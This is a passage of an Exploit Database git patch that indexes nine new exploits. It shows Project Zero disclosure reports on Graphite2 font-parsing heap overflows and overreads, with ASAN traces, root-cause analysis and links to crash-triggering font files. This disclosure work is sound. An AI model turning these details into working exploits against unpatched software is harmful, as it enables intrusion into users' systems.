From 2e7bce970215cba6169232ef421174c343d949c0 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 27 May 2016 05:03:14 +0000
Subject: [PATCH] DB: 2016-05-27 9 new exploits
Real Estate Portal 4.1 - Multiple Vulnerabilities
EduSec 4.2.5 - SQL Injection
Micro Focus Rumba+ 9.4 - Multiple Stack Buffer Overflow Vulnerabilities
HP Data Protector A.09.00 - Arbitrary Command Execution
Graphite2 - GlyphCache::GlyphCache Heap-Based Buffer Overflow
Graphite2 - GlyphCache::Loader Heap-Based Overreads
Graphite2 - TtfUtil::CheckCmapSubtable12 Heap-Based Overread
Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread
Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads
---
 files.csv | 9 +
 platforms/multiple/dos/39859.txt | 132 ++++++++++
 platforms/multiple/dos/39860.txt | 149 +++++++++++
 platforms/multiple/dos/39861.txt | 76 ++++++
 platforms/multiple/dos/39862.txt | 78 ++++++
 platforms/multiple/dos/39863.txt | 138 ++++++++++
 platforms/php/webapps/39855.txt | 86 ++++++
 platforms/php/webapps/39856.txt | 78 ++++++
 platforms/windows/dos/39857.txt | 417 ++++++++++++++++++++++++++++++
 platforms/windows/remote/39858.py | 154 +++++++++++
 10 files changed, 1317 insertions(+)
 create mode 100755 platforms/multiple/dos/39859.txt
 create mode 100755 platforms/multiple/dos/39860.txt
 create mode 100755 platforms/multiple/dos/39861.txt
 create mode 100755 platforms/multiple/dos/39862.txt
 create mode 100755 platforms/multiple/dos/39863.txt
 create mode 100755 platforms/php/webapps/39855.txt
 create mode 100755 platforms/php/webapps/39856.txt
 create mode 100755 platforms/windows/dos/39857.txt
 create mode 100755 platforms/windows/remote/39858.py
diff --git a/files.csv b/files.csv
index 96c14a510..ab798995e 100755
--- a/files.csv
+++ b/files.csv
@@ -36038,3 +36038,12 @@ id,file,description,date,author,platform,type,port
 39852,platforms/java/remote/39852.rb,"Oracle ATS Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
 39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,metasploit,unix,remote,443
 39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0
+39855,platforms/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",php,webapps,80
+39856,platforms/php/webapps/39856.txt,"EduSec 4.2.5 - SQL Injection",2016-05-26,"Bikramaditya Guha",php,webapps,80
+39857,platforms/windows/dos/39857.txt,"Micro Focus Rumba+ 9.4 - Multiple Stack Buffer Overflow Vulnerabilities",2016-05-26,LiquidWorm,windows,dos,0
+39858,platforms/windows/remote/39858.py,"HP Data Protector A.09.00 - Arbitrary Command Execution",2016-05-26,"Ian Lovering",windows,remote,0
+39859,platforms/multiple/dos/39859.txt,"Graphite2 - GlyphCache::GlyphCache Heap-Based Buffer Overflow",2016-05-26,"Google Security Research",multiple,dos,0
+39860,platforms/multiple/dos/39860.txt,"Graphite2 - GlyphCache::Loader Heap-Based Overreads",2016-05-26,"Google Security Research",multiple,dos,0
+39861,platforms/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0
+39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0
+39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0
diff --git a/platforms/multiple/dos/39859.txt b/platforms/multiple/dos/39859.txt
new file mode 100755
index 000000000..694e951bf
--- /dev/null
+++ b/platforms/multiple/dos/39859.txt
@@ -0,0 +1,132 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=749 + +The following crash due to a heap-based buffer overflow can be observed in a slightly modified ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command: + +$ ./gr2fonttest /path/to/file text + +My change in gr2FontTest was to hardcode the tested text to include all characters in the 0x1..0xfff range, instead of having to specify them in command line. The patch is as follows: + +--- cut --- +--- graphite_original/gr2fonttest/gr2FontTest.cpp 2016-02-27 19:35:16.308071127 +0100 ++++ graphite/gr2fonttest/gr2FontTest.cpp 2016-02-26 13:57:13.389186376 +0100 +@@ -437,7 +437,17 @@ + if (mainArgOffset < 1) argError = true; + else if (mainArgOffset > 1) + { +- if (!useCodes && pText != NULL) ++ const unsigned int kCodeLimit = 0x1000; ++ ++ charLength = kCodeLimit - 1; ++ ++ pText32 = (unsigned int *)malloc(sizeof(unsigned int) * kCodeLimit); ++ for (unsigned int i = 1; i < kCodeLimit; ++i) { ++ pText32[i - 1] = i; ++ } ++ pText32[kCodeLimit - 1] = 0; ++ ++ /*if (!useCodes && pText != NULL) + { + charLength = convertUtf(pText, pText32); + if (!pText32) +@@ -466,7 +476,7 @@ + { + pText32[charLength] = 0; + fprintf(log, "\n"); +- } ++ }*/ + } + return (argError) ? 
false : true; + } +--- cut --- + +The resulting ASAN crash is as follows: + +--- cut --- +==27575==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efd0 at pc 0x00000055daad bp 0x7ffdfb0bfe90 sp 0x7ffdfb0bfe88 +WRITE of size 8 at 0x60200000efd0 thread T0 + #0 0x55daac in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:133:20 + #1 0x549503 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29 + #2 0x56d3f4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #3 0x56cf04 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #4 0x56f240 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #5 0x4ec193 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ec193) + #6 0x4ef595 in main (graphite/gr2fonttest/gr2fonttest+0x4ef595) + +0x60200000efd1 is located 0 bytes to the right of 1-byte region [0x60200000efd0,0x60200000efd1) +allocated by thread T0 here: + #0 0x4b86dc in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56 + #1 0x56ac8a in graphite2::GlyphFace const** graphite2::grzeroalloc(unsigned long) graphite/src/./inc/Main.h:96:28 + #2 0x55cb26 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:119:45 + #3 0x549503 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29 + #4 0x56d3f4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #5 0x56cf04 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #6 0x56f240 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #7 0x4ec193 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ec193) + #8 0x4ef595 in main (graphite/gr2fonttest/gr2fonttest+0x4ef595) + +SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/GlyphCache.cpp:133:20 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned 
int) +Shadow bytes around the buggy address: + 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x0c047fff9df0: fa fa 00 fa fa fa 01 fa fa fa[01]fa fa fa 00 04 + 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==27575==ABORTING +--- cut --- + +A cursory analysis shows that the direct reason of the crash is the wrong assumption made by GlyphCache::GlyphCache() that the _num_glyphs field is always greater than 0. A buffer is allocated in line 128: + +--- cut --- + 128 GlyphFace * const glyphs = new GlyphFace [_num_glyphs]; +--- cut --- + +And regardless of the _num_glyphs value, data is written to its first entry in line 133: + +--- cut --- + 132 // The 0 glyph is definately required. 
+ 133 _glyphs[0] = _glyph_loader->read_glyph(0, glyphs[0], &numsubs); +--- cut --- + +While this could just end as an off-by-one error and a fixed ~8 byte overflow, it gets worse. The subsequent loop in lines 139-140 also assumes that _num_glyphs is non-zero, and additionally wrongly (in the context of the misassumption) uses the != operator instead of < in the loop end condition: + +--- cut --- + 138 const GlyphFace * loaded = _glyphs[0]; + 139 for (uint16 gid = 1; loaded && gid != _num_glyphs; ++gid) + 140 _glyphs[gid] = loaded = _glyph_loader->read_glyph(gid, glyphs[gid], &numsubs); +--- cut --- + +This essentially means that the size of the overflown area is fully controlled by an attacker; it must only be a multiple of the native word size: typically 4 or 8 bytes. + +The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1251869. Attached are three font files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39859.zip + diff --git a/platforms/multiple/dos/39860.txt b/platforms/multiple/dos/39860.txt new file mode 100755 index 000000000..80a2fd5b3 --- /dev/null +++ b/platforms/multiple/dos/39860.txt 
@@ -0,0 +1,149 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=751 + +The following crashes due to two different heap-based buffer overreads can be observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command: + +$ ./gr2fonttest /path/to/file -auto + +While we have seen the crashes to occur with six unique call stacks, eventually the OOB reads happen at two code locations: graphite2::GlyphCache::Loader::Loader (graphite/src/GlyphCache.cpp:306:38) and graphite2::GlyphCache::Loader::read_glyph (graphite/src/GlyphCache.cpp:398:27). Below you can see the ASAN reports of crashes in both functions: + +--- cut --- +================================================================= +==26347==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000bf40 at pc 0x00000055445d bp 0x7ffe231e8130 sp 0x7ffe231e8128 +READ of size 1 at 0x60c00000bf40 thread T0 + #0 0x55445c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73 + #1 0x5543c8 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:43 + #2 0x551eab in unsigned short be::read(unsigned char const*&) graphite/src/./inc/Endian.h:60:23 + #3 0x562a66 in graphite2::GlyphCache::Loader::read_glyph(unsigned short, graphite2::GlyphFace&, int*) const graphite/src/GlyphCache.cpp:398:27 + #4 0x560481 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:142:37 + #5 0x54bb13 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29 + #6 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #7 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #8 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #9 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13) + #10 0x4f0387 in main 
(graphite/gr2fonttest/gr2fonttest+0x4f0387) + +0x60c00000bf40 is located 0 bytes to the right of 128-byte region [0x60c00000bec0,0x60c00000bf40) +allocated by thread T0 here: + #0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x55dc0b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11 + #2 0x54f8b1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:280:36 + #3 0x567867 in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&, bool) graphite/src/GlyphCache.cpp:268:24 + #4 0x55ef50 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:118:21 + #5 0x54bb13 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29 + #6 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #7 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #8 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #9 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13) + #10 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387) + +SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*) +Shadow bytes around the buggy address: + 0x0c187fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff97a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff97b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff97c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff97d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 +=>0x0c187fff97e0: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa + 0x0c187fff97f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 + 0x0c187fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff9810: fa fa fa 
fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff9820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff9830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==26347==ABORTING +--- cut --- + +--- cut --- +================================================================= +==26561==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efb7 at pc 0x00000055445d bp 0x7ffc518d4260 sp 0x7ffc518d4258 +READ of size 1 at 0x60200000efb7 thread T0 + #0 0x55445c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73 + #1 0x5543c8 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:43 + #2 0x554358 in unsigned long be::_peek<4>(unsigned char const*) graphite/src/./inc/Endian.h:50:43 + #3 0x551d6b in unsigned int be::read(unsigned char const*&) graphite/src/./inc/Endian.h:60:23 + #4 0x5685a5 in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&, bool) graphite/src/GlyphCache.cpp:306:38 + #5 0x55ef50 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:118:21 + #6 0x54bb13 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29 + #7 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #8 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #9 0x571980 in gr_make_file_face 
graphite/src/gr_face.cpp:242:23 + #10 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13) + #11 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387) + +0x60200000efb7 is located 0 bytes to the right of 7-byte region [0x60200000efb0,0x60200000efb7) +allocated by thread T0 here: + #0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x55dc0b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11 + #2 0x54f8b1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:280:36 + #3 0x567867 in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&, bool) graphite/src/GlyphCache.cpp:268:24 + #4 0x55ef50 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:118:21 + #5 0x54bb13 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29 + #6 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #7 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #8 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #9 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13) + #10 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387) + +SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*) +Shadow bytes around the buggy address: + 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x0c047fff9df0: fa fa fa fa fa fa[07]fa fa fa 06 fa fa fa 00 04 + 
0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==26561==ABORTING +--- cut --- + +The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252406. Attached is an archive with three font files per each unique crash (in terms of stack trace). There are two directories with reproducers for the graphite2::GlyphCache::Loader::read_glyph crash and four directories with reproducers for graphite2::GlyphCache::Loader::Loader. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39860.zip + diff --git a/platforms/multiple/dos/39861.txt b/platforms/multiple/dos/39861.txt new file mode 100755 index 000000000..4b9e50e1a --- /dev/null +++ b/platforms/multiple/dos/39861.txt 
@@ -0,0 +1,76 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=752 + +The following crash due to a heap-based buffer overread can be observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command: + +$ ./gr2fonttest /path/to/file -auto + +--- cut --- +================================================================= +==27862==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200000be45 at pc 0x0000005f3354 bp 0x7ffe1a7ac5b0 sp 0x7ffe1a7ac5a8 +READ of size 4 at 0x61200000be45 thread T0 + #0 0x5f3353 in graphite2::TtfUtil::CheckCmapSubtable12(void const*, void const*) graphite/src/TtfUtil.cpp:1092:40 + #1 0x4fa415 in smp_subtable(graphite2::Face::Table const&) graphite/src/CmapCache.cpp:55:9 + #2 0x4fa859 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:95:29 + #3 0x54bf42 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22 + #4 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #5 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #6 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #7 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13) + #8 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387) + +0x61200000be45 is located 1 bytes to the right of 260-byte region [0x61200000bd40,0x61200000be44) +allocated by thread T0 here: + #0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x55dc0b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11 + #2 0x54f8b1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:280:36 + #3 0x4fa793 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:91:23 + #4 0x54bf42 in 
graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22 + #5 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #6 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #7 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #8 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13) + #9 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387) + +SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/TtfUtil.cpp:1092:40 in graphite2::TtfUtil::CheckCmapSubtable12(void const*, void const*) +Shadow bytes around the buggy address: + 0x0c247fff9770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c247fff9780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c247fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c247fff97a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c247fff97b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c247fff97c0: 00 00 00 00 00 00 00 00[04]fa fa fa fa fa fa fa + 0x0c247fff97d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c247fff97e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c247fff97f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa + 0x0c247fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c247fff9810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==27862==ABORTING +--- 
cut --- + +The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252411. Attached are three font files which reproduce the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39861.zip + diff --git a/platforms/multiple/dos/39862.txt b/platforms/multiple/dos/39862.txt new file mode 100755 index 000000000..9680ecc54 --- /dev/null +++ b/platforms/multiple/dos/39862.txt 
@@ -0,0 +1,78 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=755 + +The following crash due to a heap-based buffer overread can be observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command: + +$ ./gr2fonttest /path/to/file -auto + +--- cut --- +==19167==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e00000dff1 at pc 0x000000553c7d bp 0x7ffc6c2c7100 sp 0x7ffc6c2c70f8 +READ of size 1 at 0x60e00000dff1 thread T0 + #0 0x553c7c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73 + #1 0x553be8 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:43 + #2 0x56d7e3 in unsigned short be::peek(void const*) graphite/src/./inc/Endian.h:55:18 + #3 0x5f2bad in graphite2::TtfUtil::CmapSubtable4NextCodepoint(void const*, unsigned int, int*) graphite/src/TtfUtil.cpp:1042:16 + #4 0x4fce35 in bool cache_subtable<&graphite2::TtfUtil::CmapSubtable4NextCodepoint, &graphite2::TtfUtil::CmapSubtable4Lookup>(unsigned short**, void const*, unsigned int) graphite/src/CmapCache.cpp:65:33 + #5 0x4fb097 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:107:14 + #6 0x54b6d2 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22 + #7 0x56f5d4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #8 0x56f0e4 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #9 0x571420 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #10 0x4ed0b3 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed0b3) + #11 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9) + +0x60e00000dff1 is located 0 bytes to the right of 145-byte region [0x60e00000df60,0x60e00000dff1) +allocated by thread T0 here: + #0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x55d42b in 
graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11 + #2 0x54f0d1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:281:36 + #3 0x4faad3 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:91:23 + #4 0x54b6d2 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22 + #5 0x56f5d4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #6 0x56f0e4 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #7 0x571420 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #8 0x4ed0b3 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed0b3) + #9 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9) + +SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*) +Shadow bytes around the buggy address: + 0x0c1c7fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9be0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00 +=>0x0c1c7fff9bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[01]fa + 0x0c1c7fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack 
